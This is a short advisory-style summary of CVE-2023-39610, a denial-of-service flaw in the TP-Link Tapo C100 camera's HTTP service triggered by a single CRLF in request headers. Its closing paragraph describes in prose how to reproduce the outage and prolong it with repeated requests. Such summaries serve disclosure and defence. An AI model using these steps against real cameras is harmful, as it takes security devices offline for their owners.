CVE-2023-39610

An attacker on the same local network as the Tapo C100 sends a crafted HTTP GET request containing a single CRLF (Carriage Return Line Feed) in the headers [ref_id=1]. This malformed request causes the HTTP service on the device to become inaccessible for a period that scales with the number of requests sent (e.g., one request yields ~2 minutes of unavailability, ten requests yield ~10 minutes) [ref_id=1]. The attack requires no authentication and no user interaction, and the CVSS vector is AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H [ref_id=1].

The advisory does not specify a particular function or file path. The vulnerability resides in the HTTP service of the TP-Link Tapo C100 firmware version v1.1.15 Build 211130 Rel.15378n(4555) and earlier [ref_id=1]. The flaw is in the request-handling or parsing logic of the HTTP server [ref_id=1].

No patch or fix has been published by TP-Link for this vulnerability [ref_id=1]. The advisory directs users to TP-Link's security advisory page for future updates but does not include remediation guidance or a fixed firmware version [ref_id=1]. The root cause is a flaw in the HTTP service's request parsing logic that mishandles a single CRLF sequence [ref_id=1].

Send a crafted HTTP GET request containing a single CRLF in the headers to the Tapo C100's IP address. For example, a request with exactly one CRLF sequence causes the HTTP service to become unresponsive for approximately 2 minutes. Sending multiple such requests increases the downtime proportionally (e.g., 10 requests cause ~10 minutes of unavailability) [ref_id=1].